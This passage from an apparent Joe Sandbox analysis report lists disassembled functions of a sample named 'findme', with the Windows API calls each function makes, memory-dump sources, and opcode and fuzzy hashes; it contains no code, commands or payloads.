                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 70ad214ec86c7157e396bbf46a870a1c6236f9cc7e5bf4e8d449e3d72a5d0fd4
                    • Instruction ID: ac5454bf7be2717c0e4c8ab8b3992c94259b33f4818e8e8bfe73b9434b0b8ac9
                    • Opcode Fuzzy Hash: 70ad214ec86c7157e396bbf46a870a1c6236f9cc7e5bf4e8d449e3d72a5d0fd4
                    • Instruction Fuzzy Hash: 4B212874102744EFD7708F15C889FA7B7E8EB49768F00492EF5D582291C378AC458B65
                    Function 004C9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                    Download Yara Rule
                    APIs
                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004C7547,?,?,?,?), ref: 004C9D7C
                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 004C9E2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$BuffersFlushTime
                    • String ID:
                    • API String ID: 1392018926-0
                    • Opcode ID: a55251e25da3cf640afb4564135f2f791d76cf6e8c969e5e8e4aa5a4c8609c6e
                    • Instruction ID: 0b523be2f746c488e697d1c9dec1532c914f6264a1b06426f280f21c9e7618ee
                    • Opcode Fuzzy Hash: a55251e25da3cf640afb4564135f2f791d76cf6e8c969e5e8e4aa5a4c8609c6e
                    • Instruction Fuzzy Hash: 5221E435148246BBC750DE25C455FABBBE4AF51708F04085FB4C293241C72DEE0CCBA5
                    Function 004EA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,004F3958), ref: 004EA4B8
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004EA4C5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AddressProc__crt_fast_encode_pointer
                    • String ID:
                    • API String ID: 2279764990-0
                    • Opcode ID: 7b6f569b7b3fe90cbaa71530bef54d19359ad1f38d9501539f4412cd86ffccf2
                    • Instruction ID: f3b9d0ddd428bba19f374afb836be75628cd2ee2732dc963b7fee3a072d5a143
                    • Opcode Fuzzy Hash: 7b6f569b7b3fe90cbaa71530bef54d19359ad1f38d9501539f4412cd86ffccf2
                    • Instruction Fuzzy Hash: 5B113D336001649BAF31DE2BEC4486B73919B803217164122FD15EF394DA78FC21C7DA
                    Function 004C9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,004C9B35,?,?,00000000,?,?,004C8D9C,?), ref: 004C9BC0
                    • GetLastError.KERNEL32 ref: 004C9BCD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: edcafd10bb7da1964e8f0972c19f5ea318998f0e61ca845c6b3ce6ba878c7760
                    • Instruction ID: a5afe224bd7f1064d82d8e8514935a5b6ff8b52109a5c2e5cb09a2f67388efb5
                    • Opcode Fuzzy Hash: edcafd10bb7da1964e8f0972c19f5ea318998f0e61ca845c6b3ce6ba878c7760
                    • Instruction Fuzzy Hash: C401E53A204205BF8B48CF25AC88E7BB359BFC1721B14453FE81683280EA38EC059629
                    Function 004C9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 004C9E76
                    • GetLastError.KERNEL32 ref: 004C9E82
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: 287c3c9cdab1a09a915bf77855102a4352d301c4ad484688a0d8793379747e96
                    • Instruction ID: 85dd503cbaaf0a590e5ec37fa625a74218f060d4cb55b055ece692b2792da806
                    • Opcode Fuzzy Hash: 287c3c9cdab1a09a915bf77855102a4352d301c4ad484688a0d8793379747e96
                    • Instruction Fuzzy Hash: 9C018C793042006BEB749E299888B6BB6D99B98319F15893FB146C36C0DB39EC488619
                    Function 004E8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004E8627
                      • Part of subcall function 004E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00500F50,004CCE57,?,?,?,?,?,?), ref: 004E8663
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Heap$AllocAllocate_free
                    • String ID:
                    • API String ID: 2447670028-0
                    • Opcode ID: bbf9bda03de6d3bbe91320b9b1bbaa9a27cc9cff0a49d10ea6a2c3e58f6ed552
                    • Instruction ID: ef55a608418e81dc3978cab5e1916534d41488c72000f428200a1e21bdb3d4de
                    • Opcode Fuzzy Hash: bbf9bda03de6d3bbe91320b9b1bbaa9a27cc9cff0a49d10ea6a2c3e58f6ed552
                    • Instruction Fuzzy Hash: 6CF0C2315015D56ACF212B33AC00E6F37689FE27B7F24421FF81C96291DE2CC80295AD
                    Function 004D0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?), ref: 004D0915
                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 004D091C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Process$AffinityCurrentMask
                    • String ID:
                    • API String ID: 1231390398-0
                    • Opcode ID: eecdbdcfce278150956a8614c433817e1de3b0cca5e043c7f7520a55eb438648
                    • Instruction ID: bcfc4b46fd414b8e466d2a0c3c8baa39c53f6872763ca5a0d09d206e2158b224
                    • Opcode Fuzzy Hash: eecdbdcfce278150956a8614c433817e1de3b0cca5e043c7f7520a55eb438648
                    • Instruction Fuzzy Hash: 80E092B2A10109BB6F09CAB49C34ABB739DEB04215B2041FBA806D3301F938DE0186AC
                    Function 004CA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004CA27A,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA458
                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004CA27A,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA489
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 3e7c6e9847f6193bc32bfaa20f7ecfa2c29434645aa175f501f3c7356328a06a
                    • Instruction ID: cb650d17ed24efe5705151532d4fb60676e3d6f11561fbf24d6bf096967db2cd
                    • Opcode Fuzzy Hash: 3e7c6e9847f6193bc32bfaa20f7ecfa2c29434645aa175f501f3c7356328a06a
                    • Instruction Fuzzy Hash: 2CF0A73524020D7BDF419F61DC05FEA375CBB05389F04806ABC4886261DB7589B4EA58
                    Function 004DD573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemText_swprintf
                    • String ID:
                    • API String ID: 3011073432-0
                    • Opcode ID: 7790b93624fe7c19bbf28467d83f2ead06afd389f4b9e326e9551b7eacc7b499
                    • Instruction ID: c3df48847af10c1b68bb3f4a9e5dda30c0bb7cd7f466588b5697d9ba8b6ad75a
                    • Opcode Fuzzy Hash: 7790b93624fe7c19bbf28467d83f2ead06afd389f4b9e326e9551b7eacc7b499
                    • Instruction Fuzzy Hash: 9FF05C319003487ADB11AB719C03FAE371C9B0574DF00096FB601531A2D9796A249766
                    Function 004CA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteFileW.KERNELBASE(?,?,?,004C984C,?,?,004C9688,?,?,?,?,004F1FA1,000000FF), ref: 004CA13E
                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,004C984C,?,?,004C9688,?,?,?,?,004F1FA1,000000FF), ref: 004CA16C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 0b7a3257f3154fc09456d10286f95c8e26fbcb0854fea3a85935e7cd90546d3e
                    • Instruction ID: 9dd57be5bd7b0831c747fb402caf3b0a1da9267839168214ea5bb34f77a7a64d
                    • Opcode Fuzzy Hash: 0b7a3257f3154fc09456d10286f95c8e26fbcb0854fea3a85935e7cd90546d3e
                    • Instruction Fuzzy Hash: C6E06D3964020C6ADB11AE61DC41FEA775CEB08386F48406BB888C6164DF65DDA4EA99
                    Function 004DA39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    • GdiplusShutdown.GDIPLUS(?,?,?,?,004F1FA1,000000FF), ref: 004DA3D1
                    • CoUninitialize.COMBASE(?,?,?,?,004F1FA1,000000FF), ref: 004DA3D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: GdiplusShutdownUninitialize
                    • String ID:
                    • API String ID: 3856339756-0
                    • Opcode ID: 2a3d1565ba0643f2ca9b952418f6a961b66146acfffaab83cb3ffea60e4ee1d8
                    • Instruction ID: 4c7c945f32b9dc151ab016d7974d74a8357e3441b24dacc35614bfa0c2fee849
                    • Opcode Fuzzy Hash: 2a3d1565ba0643f2ca9b952418f6a961b66146acfffaab83cb3ffea60e4ee1d8
                    • Instruction Fuzzy Hash: 30F03032518654EFC7109B4DDC05B19FBA8FB49B20F04436AF41983760CB786811CA95
                    Function 004CA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,?,004CA189,?,004C76B2,?,?,?,?), ref: 004CA1A5
                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,004CA189,?,004C76B2,?,?,?,?), ref: 004CA1D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 36104da67117b0d8f265137d175bbeb674b6fc2764c3023269c4bd61d812bcf1
                    • Instruction ID: e47316e74b86429c560d4b37f0b0feecd81f04da88bdc5f173197aa69563a95c
                    • Opcode Fuzzy Hash: 36104da67117b0d8f265137d175bbeb674b6fc2764c3023269c4bd61d812bcf1
                    • Instruction Fuzzy Hash: 39E02B3690001C6BCB51AB64CC05FE5775CEB093E6F040177FD44D3290CB708D548AD4
                    Function 004D0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll,00000000,004CEC0A,?,?,004CEBEC,?,?,?), ref: 004D00C2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystem
                    • String ID:
                    • API String ID: 1175261203-0
                    • Opcode ID: 2bb58ffb5f66dad335566d836bc022bc98d7dc890a1886d5ecdfa087af07af88
                    • Instruction ID: b997bc5e173d2cf95b71e4dd7bf902163adbd1cc9a258534c4d6247b79548135
                    • Opcode Fuzzy Hash: 2bb58ffb5f66dad335566d836bc022bc98d7dc890a1886d5ecdfa087af07af88
                    • Instruction Fuzzy Hash: 8BE0127690111C6ADB61AAA5EC05FE677ACEF09382F0400ABB948D3104DA749A54CBE9
                    Function 004D9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                    Download Yara Rule
                    APIs
                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004D9B30
                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 004D9B37
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: BitmapCreateFromGdipStream
                    • String ID:
                    • API String ID: 1918208029-0
                    • Opcode ID: 7845f4624eb36a0d8f16c439b22a4bd498384c2e539e2dae431ef6392f958368
                    • Instruction ID: d24078f2cc85ae0dddb2875feb8b7850fe95f1277b3583f98dae75fc724ca941
                    • Opcode Fuzzy Hash: 7845f4624eb36a0d8f16c439b22a4bd498384c2e539e2dae431ef6392f958368
                    • Instruction Fuzzy Hash: CDE0ED71901218EBDB10EF99D5017AAB7F8EB04321F10809FE895D7301D7796E049B95
                    Function 004E215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004E329A: try_get_function.LIBVCRUNTIME ref: 004E32AF
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E217A
                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004E2185
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                    • String ID:
                    • API String ID: 806969131-0
                    • Opcode ID: 6be2f47a1cddca9e8fa2e895cb5e58860e004acdcd7d9a47c91015316efbf61d
                    • Instruction ID: 9a1d01db9eeebc5616c7a43b755aa0167ba2bcbe1513de41b2413f1cd609d1dd
                    • Opcode Fuzzy Hash: 6be2f47a1cddca9e8fa2e895cb5e58860e004acdcd7d9a47c91015316efbf61d
                    • Instruction Fuzzy Hash: 25D0A7341043C535E9082BB33A465AA534C6F53B7B3F0064BE720C61D1EEDC4301611D
                    Function 004DDC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • DloadLock.DELAYIMP ref: 004DDC73
                    • DloadProtectSection.DELAYIMP ref: 004DDC8F
                      • Part of subcall function 004DDE67: DloadObtainSection.DELAYIMP ref: 004DDE77
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Dload$Section$LockObtainProtect
                    • String ID:
                    • API String ID: 731663317-0
                    • Opcode ID: a03476922ad819b1f679fb3cd2b2b5d22bc975eedfe96a3d05b690329e679a93
                    • Instruction ID: 3bb9669592201951610d7901829a81201e785d6d7bef50dec6e9216220d79f24
                    • Opcode Fuzzy Hash: a03476922ad819b1f679fb3cd2b2b5d22bc975eedfe96a3d05b690329e679a93
                    • Instruction Fuzzy Hash: 07D0A7B09402104AC210AB10585131C6270BB16748F501507A105923D5CBBC0845D10D
                    Function 004C12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemShowWindow
                    • String ID:
                    • API String ID: 3351165006-0
                    • Opcode ID: e666dfe24d2dac03f39b1b35eaf0ed2a774de85d279740b77285b7ed2eb122d8
                    • Instruction ID: 1627be43dbeb5a53cb8dc4aa2d3b01d9b2f9428fc64a82e25e6e6c4ca1103585
                    • Opcode Fuzzy Hash: e666dfe24d2dac03f39b1b35eaf0ed2a774de85d279740b77285b7ed2eb122d8
                    • Instruction Fuzzy Hash: 86C0123A058200BECB010BB0DC09D3FBBA8AFA6212F05C908B2A5C0060C238C028EB11
                    Function 004C19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
